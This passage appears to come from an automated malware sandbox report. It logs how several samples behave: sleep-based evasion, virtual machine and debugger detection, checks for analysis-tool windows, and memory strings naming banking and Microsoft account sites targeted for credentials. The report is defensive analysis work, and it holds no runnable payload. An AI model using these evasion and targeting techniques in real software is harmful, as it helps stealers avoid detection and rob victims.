                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe TID: 7296Thread sleep time: -6269133s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -17524406870024063s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -30000s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep time: -1844674407370954s >= -30000s
                                      Source: C:\Windows\SysWOW64\timeout.exe TID: 6852Thread sleep count: 38 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -1844674407370954s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1496Thread sleep count: 2378 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1496Thread sleep count: 315 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -1844674407370954s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1948Thread sleep count: 3328 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep count: 1328 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep time: -2767011611056431s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 3727 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164Thread sleep count: 144 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep time: -2767011611056431s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4736Thread sleep time: -5534023222112862s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe TID: 4972Thread sleep time: -150000s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6748Thread sleep count: 4092 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -5534023222112862s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0097EF71 FindFirstFileExW,13_2_0097EF71
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0041EF71 FindFirstFileExW,14_2_0041EF71
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00407620
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00401280
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00401090
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040A150
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,17_2_0040B570
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0040B110
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040B3A0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,18_2_006ADBBE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0067C2A2 FindFirstFileExW,18_2_0067C2A2
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B68EE FindFirstFileW,FindClose,18_2_006B68EE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,18_2_006B698F
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_006AD076
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_006AD3A9
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_006B9642
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_006B979D
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,18_2_006B9B2B
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B5C97 FindFirstFileW,FindNextFileW,FindClose,18_2_006B5C97
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009493D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,13_2_009493D0
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeThread delayed: delay time: 30000Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeThread delayed: delay time: 180000Jump to behavior
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\userJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppDataJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                      Source: rapes.exe, rapes.exe, 00000003.00000002.1046903594.000000000043B000.00000040.00000001.01000000.00000007.sdmp, TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1637933726.000000000036B000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                                      Source: trano1221.exe, 00000023.00000003.1602103221.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                                      Source: amnew.exe, 0000000D.00000003.1315417048.00000000010E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1481927220.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079863840.0000000001341000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1467013696.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1508453490.0000000001337000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.2079265890.0000000001338000.00000004.00000020.00020000.00000000.sdmp, UD49QH6.exe, 00000010.00000003.1417138519.0000000001339000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.0000000000623000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1941933794.000001E16B4E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.0000000010035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                                      Source: mshta.exe, 0000001C.00000003.1535151495.0000028CB7C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}gXi
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                                      Source: powershell.exe, 00000019.00000002.1608263973.000000000703D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.0000000010035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                                      Source: powershell.exe, 00000019.00000002.1605837411.0000000006FB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yx
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                                      Source: mshta.exe, 00000014.00000003.1521428601.0000000002CF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%(R/
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                                      Source: M6gQuZPvgY.exe, 00000000.00000002.1004978180.00000000003FB000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000002.00000002.1039237167.000000000043B000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 00000003.00000002.1046903594.000000000043B000.00000040.00000001.01000000.00000007.sdmp, TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, 00000022.00000002.1637933726.000000000036B000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                                      Source: UD49QH6.exe, 00000010.00000003.1434865164.0000000005BB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeAPI call chain: ExitProcess graph end nodegraph_17-53356
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSystem information queried: ModuleInformationJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess information queried: ProcessInformationJump to behavior

                                      Anti Debugging

                                      barindex
                                      Hides threads from debuggers
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeThread information set: HideFromDebugger
                                      Potentially malicious time measurement code found
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeCode function: 0_2_052F036F Start: 052F04C4 End: 052F03AB0_2_052F036F
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeCode function: 0_2_052F03E4 Start: 052F04C4 End: 052F03AB0_2_052F03E4
                                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: gbdyllo
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: procmon_window_class
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: ollydbg
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeFile opened: NTICE
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeFile opened: SICE
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeFile opened: SIWVID
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess queried: DebugPort
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess queried: DebugPort
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeCode function: 0_2_052F0000 rdtsc 0_2_052F0000
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006BEAA2 BlockInput,18_2_006BEAA2
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0096A1A5
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_004054F0 VirtualProtect ?,00000004,00000100,0000000017_2_004054F0
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00409220
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0096DB60 mov eax, dword ptr fs:[00000030h]13_2_0096DB60
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00975FF2 mov eax, dword ptr fs:[00000030h]13_2_00975FF2
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0040DB60 mov eax, dword ptr fs:[00000030h]14_2_0040DB60
